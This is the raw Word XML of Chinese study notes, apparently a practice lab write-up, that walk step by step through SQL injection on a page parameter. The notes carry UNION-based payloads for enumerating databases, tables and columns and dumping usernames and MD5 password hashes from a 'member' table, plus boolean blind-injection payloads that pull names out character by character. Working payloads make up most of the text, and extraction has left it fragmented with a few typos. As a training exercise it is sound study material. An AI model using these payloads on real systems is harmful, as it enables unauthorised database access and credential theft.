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OLE_LINK6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>联合注入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判断是否有注入点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and 1=1--+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猜列数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'order by 1--+ 一直猜到5报错，列数为4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猜库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'and 1=1改为and 1=2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'and 1=2 union select 1,2,3,4--+发现标题为2，内容为3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'and 1=2 union select 1,user(),database(),4--+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and 1=2 union select 1,database(),schema_name,4 from information_schema.schemata limit 0,1--+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and 1=2 union select 1,database(),schema_name,4 from information_schema.schemata limit 1,1--+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and 1=2 union select 1,database(),schema_name,4 from information_schema.schemata limit 2,1--+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and 1=2 union select 1,database(),schema_name,4 from information_schema.schemata limit 3,1--+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and 1=2 union select 1,database(),schema_name,4 from information_schema.schemata limit 4,1--+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得到五个数据库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爆表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and 1=2 union select 1,database(),table_name,4 from information_schema.tables where table_schema='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admin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limit 0,1--+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and 1=2 union select 1,database(),table_name,4 from information_schema.tables where table_schema='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admin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limit 1,1--+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猜表里面的列名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and 1=2 union select 1,database(),column_name,4 from information_schema.columns where table_name='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member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limit 0,1--+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and 1=2 union select 1,database(),column_name,4 from information_schema.columns where table_name='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member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limit 1,1--+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and 1=2 union select 1,database(),column_name,4 from information_schema.columns where table_name='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member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limit 2,1--+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and 1=2 union select 1,database(),column_name,4 from information_schema.columns where table_name='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member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' limit 3,1--+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得到四个列名id，name，password，status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查询用户名和密码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 xml:space="preserve">' and 1=2 union select 1,name,password,4 from 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member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 xml:space="preserve"> limit 0,1--+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 xml:space="preserve">' and 1=2 union select 1,name,password,4 from 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member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 xml:space="preserve"> limit 1,1--+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得到两组md5加密的密码 用md5解密即可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盲注</w:t>
      </w:r>
    </w:p>
    <w:p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数据库长度：http://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length(database())=10 --+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2.爆数据库名：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bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/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database()),1,1))=115 --+  s  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database()),2,1))=116 --+  t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database()),3,1))=111--+   o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database()),4,1))=114--+   r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database()),5,1))=109--+   m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database()),6,1))=103--+   g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database()),7,1))=114--+   r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database()),8,1))=111--+   o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database()),9,1))=117--+   u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database()),10,1))=112--+  p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数据库名：stormgroup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3.爆表名：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table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),1,1))=109 --+           m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table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),2,1))=101 --+            e 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table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),3,1))=109 --+            m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table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),4,1))=98 --+              b   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table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),5,1))=101 --+           e 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table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),6,1))=114 --+           r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表一：member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table_name from     information_schema.tables where table_schema='stormgroup' limit 1,1),1,1))=110 --+          n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table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),2,1))=111 --+          o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table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),3,1))=116 --+          t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table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),4,1))=105 --+          i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table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),5,1))=99 --+           c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table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),6,1))=101 --+         e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表二：notice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3.爆字段：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length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4 --+                 长度为4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column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),1,1))=110 --+             n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column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=97 --+               a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column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=109 --+             m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dump from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=101 --+             e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字段一：name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length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 1,1))=8 --+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字段二：猜想为password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字段三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length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 2,1))=6 --+   长度为6，猜想字段名为status(显示1账户可用，0不可用）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4.爆字段内容：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先爆status字段内容：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length((select concat(status) from stormgroup.member limit 0,1))=1 --+          长度为一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andascii(substr((select concat(name) from stormgroup.member limit 0,1),1,1))=48 --+         0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账户状态为0不可用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length((select concat(status) from stormgroup.member limit 1,1))=1 --+           长度为一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andascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=49 --+         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 账户状态为1可用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name字段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length((select concat(name) from stormgroup.member limit 1,1))=5 --+             长度为5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concat(name) from stormgroup.member limit 1,1),1,1))=109 --+     m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concat(name) from stormgroup.member limit 1,1),2,1))= 111--+      o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ascii(substr((select concat(name) from stormgroup.member limit 1,1),3,1))=122 --+       z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.......猜想库名为mozhe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password字段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http://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34495E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/new_list.php?id=1 and length((select concat(password) from stormgroup.member limit 1,1))=32 --+            长度为32。。。。晕，太多了，上sqlmap，拿32位md5值。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7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佳豪</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-29T08:42:16Z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